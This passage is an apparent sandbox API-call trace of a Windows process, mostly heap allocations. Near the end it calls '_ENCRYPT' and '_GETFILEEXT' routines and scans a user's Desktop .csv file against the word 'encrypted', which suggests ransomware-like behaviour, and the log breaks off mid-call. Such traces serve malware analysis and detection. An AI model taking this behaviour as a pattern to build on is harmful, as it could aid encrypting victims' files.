dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0031.994] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0031.994] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0031.994] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0031.994] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0031.994] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0031.994] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0031.994] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0031.994] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0031.994] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0031.994] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0031.994] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0031.994] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0031.994] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0031.994] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0031.994] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0031.994] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0031.994] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0031.994] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0031.994] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0031.994] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0031.994] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0031.994] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0031.994] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0031.994] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0031.994] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0031.994] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0031.994] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0031.994] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0031.994] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0031.994] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0031.994] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0031.994] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0031.994] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0031.994] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0031.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0031.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0031.995] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0031.995] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0031.995] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0031.995] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0031.995] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0031.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0031.995] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0031.995] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0031.995] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0031.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0031.995] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0031.995] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0031.995] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0031.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0031.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0031.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0031.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0031.995] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0031.995] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0031.995] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0031.995] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0031.995] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0031.995] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0031.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0031.995] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0031.995] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0031.995] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0031.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0031.995] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0031.995] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0031.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0031.996] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0031.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0031.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0031.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0031.996] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0031.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0031.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0031.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0031.996] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0031.996] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0031.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0031.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0031.996] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0031.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0031.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0031.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0031.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0031.996] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0031.996] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0031.996] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0031.996] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0031.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0031.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0031.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0031.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0031.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0031.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0031.996] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0031.996] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0031.996] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0031.996] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0031.996] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0031.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0031.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0031.997] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0031.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8898e0 [0031.997] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x8898e0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0031.997] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0031.997] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0031.997] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0031.997] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0031.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0031.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0031.997] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0031.997] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0031.997] CloseHandle (hObject=0x140) returned 1 [0031.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0031.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b85a8 [0031.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0031.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0031.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0031.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0031.997] FreeLibrary (hLibModule=0x76e10000) returned 1 [0031.997] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0031.997] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0031.998] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0031.998] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0031.998] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0031.998] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0031.998] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0031.998] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0031.998] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0031.998] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0031.998] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0031.998] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0031.998] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0031.998] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0031.998] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0031.998] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0031.998] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0031.998] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0031.998] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0031.998] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0031.998] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0031.998] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0031.998] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0031.998] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0031.998] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0032.022] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0032.022] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.022] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0032.022] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0032.022] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.022] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.022] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.022] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".csv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0032.022] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.022] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.022] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.022] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WPwH2Letaqsal.csv", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x87352130, ftCreationTime.dwHighDateTime=0x1d5c596, ftLastAccessTime.dwLowDateTime=0xb2371be0, ftLastAccessTime.dwHighDateTime=0x1d5b6f0, ftLastWriteTime.dwLowDateTime=0xb2371be0, ftLastWriteTime.dwHighDateTime=0x1d5b6f0, nFileSizeHigh=0x0, nFileSizeLow=0x93d0, dwReserved0=0x0, dwReserved1=0x777648, cFileName="WPwH2Letaqsal.csv", cAlternateFileName="WPWH2L~1.CSV")) returned 0x7c20c0 [0032.022] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0032.022] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.022] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WPwH2Letaqsal.csv", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x87352130, ftCreationTime.dwHighDateTime=0x1d5c596, ftLastAccessTime.dwLowDateTime=0xb2371be0, ftLastAccessTime.dwHighDateTime=0x1d5b6f0, ftLastWriteTime.dwLowDateTime=0xb2371be0, ftLastWriteTime.dwHighDateTime=0x1d5b6f0, nFileSizeHigh=0x0, nFileSizeLow=0x93d0, dwReserved0=0x0, dwReserved1=0x777648, cFileName="WPwH2Letaqsal.csv", cAlternateFileName="WPWH2L~1.CSV")) returned 0x7c20c0 [0032.022] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0032.023] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WPwH2Letaqsal.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WPwH2Letaqsal.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WPwH2Letaqsal.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WPwH2Letaqsal.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WPwH2Letaqsal.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Desktop\\WPwH2Letaqsal.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Desktop\\WPwH2Letaqsal.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Desktop\\WPwH2Letaqsal.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Desktop\\WPwH2Letaqsal.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Desktop\\WPwH2Letaqsal.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Desktop\\WPwH2Letaqsal.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Desktop\\WPwH2Letaqsal.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Desktop\\WPwH2Letaqsal.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Desktop\\WPwH2Letaqsal.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Desktop\\WPwH2Letaqsal.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Desktop\\WPwH2Letaqsal.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Desktop\\WPwH2Letaqsal.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Desktop\\WPwH2Letaqsal.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Desktop\\WPwH2Letaqsal.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Desktop\\WPwH2Letaqsal.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Desktop\\WPwH2Letaqsal.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Desktop\\WPwH2Letaqsal.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Desktop\\WPwH2Letaqsal.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Desktop\\WPwH2Letaqsal.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Desktop\\WPwH2Letaqsal.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Desktop\\WPwH2Letaqsal.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Desktop\\WPwH2Letaqsal.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Desktop\\WPwH2Letaqsal.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Desktop\\WPwH2Letaqsal.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Desktop\\WPwH2Letaqsal.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Desktop\\WPwH2Letaqsal.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Desktop\\WPwH2Letaqsal.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop\\WPwH2Letaqsal.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop\\WPwH2Letaqsal.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.023] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop\\WPwH2Letaqsal.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.024] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top\\WPwH2Letaqsal.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.024] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op\\WPwH2Letaqsal.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.024] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p\\WPwH2Letaqsal.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.024] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 